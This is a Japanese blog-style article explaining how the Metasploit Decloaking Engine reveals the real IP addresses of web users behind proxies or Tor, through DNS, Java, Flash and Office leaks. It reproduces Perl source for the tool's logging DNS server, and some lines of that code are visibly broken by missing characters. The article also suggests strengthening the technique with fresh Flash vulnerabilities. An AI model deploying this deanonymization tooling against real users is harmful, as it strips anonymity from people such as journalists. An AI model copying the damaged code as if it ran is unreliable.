Decloaking Engineはクライアント側の技術とカスタムサービスの組み合わせを使用してプロキシ設定に関係なくWebユーザの実際のIPアドレスを示すためのシステムです。
このツールは脆弱性を用いた攻撃は行いません。

Decloking Engineの動作原理

  1. Webクライアントがホスト名を解決しようとすると、その設定されたDNSサーバに検索要求を送信します。クライアントのDNSサーバは特定のドメインのネームサーバにクエリを送信します。ホスト名は一位の識別子が含まれている場合、DNSサーバはクライアントのIPアドレスを関連づけることが可能です。しかし被害者がsocks4a, socks5を利用しており、socks proxy越しにdnsリクエストを送信する場合、この手法は通用しません。socks4を利用している場合は通用します。

  2. Javaアプレットは、ソケットAPIを使用してホスト名を解決しようとすると、ホスト名がアプレットを提供するWebサイトと同じでない場合、セキュリティ例外が発生します。しかし、セキュリティ例外がトリガされていても、DNS要求自体は依然として、クライアントのDNSサーバーに送信されます。これは、DNS対応プロキシサーバが使用中の場合、特定のクライアントがあっても例に、ウェブにアクセスして、そこからISPや企業をリークすることができます。

  3. JavaアプレットはUDPパケットを送信すると、パケットは通常、プロキシサービスを経由せずに送信されます。これは、Webクライアントの実際の外部IPアドレスをリークします。このメソッドは、Javaの新しいバージョンでは動作しない可能性があり、パケットの宛先は、アプレットを提供するホストのIPアドレスに制限されています。

  4. Javaが有効になっている場合、Webクライアントのホスト名とIPアドレスは、ソケットAPIにアクセスすることができます。この方法は、ユーザのホスト名とIPアドレスが漏洩します。言い換えれば、これは、システムがNATゲートウェイまたはプロキシサーバの背後にある場合でも、システムの内部IPアドレスが漏洩します。

  5. Flashプラグインがインストールされると、それは、バック元のホストへの直接TCP接続を可能にします。これらの接続は、ユーザーのホストの実際の外部アドレスが漏れ、プロキシサーバをバイパスすることがあります。

  6. Microsoft Officeがインストールされ、自動的に開いているドキュメントに設定されている場合、ファイルは自動的にインターネットから画像をダウンロードする返すことができます。これは、プロキシ設定を省略して、ユーザーの実際のDNSサーバを公開することができます。

カスタムDNSサーバ

動作原理で説明した手法を実行するためにはカスタムされたDNSサーバを用意しなければなりません。カスタムDNSサーバはmetasploit framework teamによりソースコードが公開されています。

#!/usr/bin/perl
###############

use Net::DNS::Nameserver;
use DBD::Pg;

use strict;
use warnings;

# Configure the user ID to run as (must start as root)
my $user = 1015;

# Configure the interfaces and ports
# You need :53 on the wildcard domain and :5353 on the IP running the web site
my $bind = [ ['0.0.0.0', 53], ['0.0.0.0', 5353] ];

# You need :53530 TCP on the IP running the web site
my $tcps = [ ['0.0.0.0', 53530] ];

# Wildcard subdomain we handle DNS for
my $dom  = "red.metasploit.com";

# Configure postgres credentials
my $db_name = "dbname";
my $db_user = "dbuser";
my $db_pass = "dbpass";
my $dbh;

my $opts = {
        AutoCommit => 1,
        RaiseError => 0,
};

# Escape the $dom var to be a valid regex
$dom =~ s/\./\\\./g;

foreach my $c ( @{$bind} ) {
        if (! fork()) {
                Launch($c->[0], $c->[1]);
                exit(0);
        }
}

foreach my $c ( @{$tcps} ) {
        if (! fork()) {
                LaunchTCP($c->[0], $c->[1]);
                exit(0);
        }
}

exit(0);

# This table must already exist
##
# Table "public.requests"
#  Column |         Type          | Modifiers
# --------+-----------------------+-----------
# cid    | character(32)         |
# type   | character varying(16) |
# eip    | character varying(16) |
# iip    | character varying(16) |
# dip    | character varying(16) |
# stamp  | timestamp             |
##

sub reply_handler {
        my ($qname, $qclass, $qtype, $peerhost) = @_;
        my ($rcode, @ans, @auth, @add);

        if ($qname =~ m/^([a-z0-9]{32})\.(\w+)\.(\d+\.\d+\.\d+\.\d+)\.(\d+\.\d+\.\d+\.\d+)\.$dom/) {
                # print "$peerhost > $qname (MATCH)\n";
                my ($cid, $type, $eip, $iip, $dip) = ($1, $2, $3, $4, $peerhost);
                my $sth = $dbh->prepare("INSERT INTO requests values (?, ?, ?, ?, ?, now())");
                $sth->execute($cid, $type, $eip, $iip, $dip);
                $sth->finish();
        }else{
                # print "$peerhost > $qname (NO MATCH)\n";
        }

         if ($qtype eq "A")
         {
             my ($ttl, $rdata) = (1, $peerhost);
             push @ans, Net::DNS::RR->new("$qname $ttl $qclass A $rdata");
             $rcode = "NOERROR";
         }
         elsif ($qtype eq "PTR") {
             my ($ttl, $rdata) = (1, $peerhost);
             push @ans, Net::DNS::RR->new("$qname $ttl $qclass A $rdata");
             $rcode = "NOERROR";
         }
         else {
             my ($ttl, $rdata) = (1, $peerhost);
             push @ans, Net::DNS::RR->new("$qname $ttl $qclass A $rdata");
             $rcode = "NOERROR";
         }

         # mark the answer as authoritive (by setting the 'aa' flag
         return ($rcode, \@ans, \@auth, \@add, { aa => 1 });
}

sub Launch {

my $host = shift();
my $port = shift();

$0 .= " ($host:$port)";

$dbh = DBI->connect("DBI:Pg:dbname=$db_name", $db_user, $db_pass, $opts) || die "Couldn't connect to database: " . DBI->errstr;

my $ns = Net::DNS::Nameserver->new(
    LocalPort    => $port,
    LocalAddr    => $host,
    ReplyHandler => \&reply_handler,
    Verbose      => 0,
);


$ = $user;


if ($ns) {
        $ns->main_loop;
} else {
   die "Couldn't create nameserver object\n";
}

}

sub LaunchTCP {

my $host = shift();
my $port = shift();

$0 .= " TCP ($host:$port)";

my $srv =  IO::Socket::INET->new(
        'Proto'     => 'tcp',
        'LocalPort' => $port,
        'LocalAddr' => $host,
        'Listen'    => 5,
        'Reuse'     => 1
);

die unless $srv;

while (my $cli = $srv->accept()) {

        if(! fork()) {
                my $sel = IO::Select->new($cli);
                $cli->autoflush(1);
                if ($sel->can_read(5)) {
                        my $buf = ;
                        if ($buf && $buf =~ m/^([a-z0-9]{32}):(.*)/i) {
                                my $cid = $1;
                                my $eip = $2;
                                chomp($eip);

                                $dbh = DBI->connect("DBI:Pg:dbname=$db_name", $db_user, $db_pass, $opts) || die "Couldn't connect to database: " . DBI->errstr;
                                my $sth = $dbh->prepare("INSERT INTO requests values (?, ?, ?, ?, ?, now())");
                                $sth->execute($cid, 'socket', $eip, '0.0.0.0', $cli->peerhost);
                                $sth->finish();
                                print $cli ($cli->peerhost . "\x00");
                        }
                }
                $cli->close();
                exit(0);
        }
}

}

カスタムDNSサーバはPerlのはNet::DNS::Nameserverのスクリプトを使用して要求を処理し、特定のドメインに対するすべての要求を処理します。このDNSサーバーの巧妙な機能はspy.metasploit.comドメイン内の任意のホストを検索すると、独自に設定されたDNSサーバの外部IPアドレスを返すことです。また、このサーバーはフラッシュからJavaやTCP要求からのUDP要求を処理します。

decloaking Engineの現状と未来

Decloaking Engineは2008年に発表されましたが、現時点では削除されているようです。確かに陳腐化する手法ではあると思いますが、FBIが利用していると言うならば、基本となる考え方は実績があり、例えば日々発見されるFlashなどの脆弱性を組み込めば使えるようになるはずです。
しかし未来を見据えるなら、Flashは今後どのブラウザでも廃止されHTML5になるでしょう。JavaAppletやJavaはTorブラウザからは使用すべきではないということはTorを利用している人なら多くの人が理解していますし、デフォルト設定ではそうなっています。

まとめ

FBIの現時点での手法は苦肉の策であり、脆弱性を組み込まない限り成功率も低く、将来的にも使えるものではないようです。DeepWebは必要に駆られたジャーナリストなどに使用されるならば、新たな可能性を秘めていると考えますが、児童ポルノに関わる犯罪をなくすためにも新たな手法が望まれています。